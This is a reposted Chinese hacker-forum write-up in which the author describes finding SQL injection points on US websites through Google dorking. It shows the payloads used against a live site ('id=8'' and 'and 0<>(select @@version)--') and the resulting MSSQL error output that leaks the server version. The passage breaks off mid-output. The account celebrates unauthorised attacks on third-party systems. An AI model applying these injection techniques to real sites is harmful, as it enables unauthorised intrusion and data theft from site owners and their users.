[转载]一次通过注入渗透USA网站过程

作者:rover[play8.net]
信息来源:www.qfaq.com

这几天看了好多注入方面的文章,看的俺是热血沸腾啊~准备找个站注入看看~中国的俺不干~也不是爱国~是经不起人骂~~~~
注入的最基本要求是找一个注入点的~去哪找那么多的注入点呢~俺想到了google
搜了一个很经典的注入点后缀.asp?ID=8,选的是”搜索所有网页”,.哈,一大片英文叶子
挨个点上手工测试~
http://xxx.com/list.asp?id=8’
如果过滤了单引号就返回示正常页面~
经过俺找了好多的网站,终于找到一个传说中的注入点
http://www.sssd.com/program_detail.asp?id=8'
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
好~说明很有可能注入~而且是mssql,俺喜欢
再测试
http://www.sssd.com/program_detail.asp?id=8 and 0<;>(select @@version)—
这个是返回对方系统的版本和sql版本的
返回
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value &#39;Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright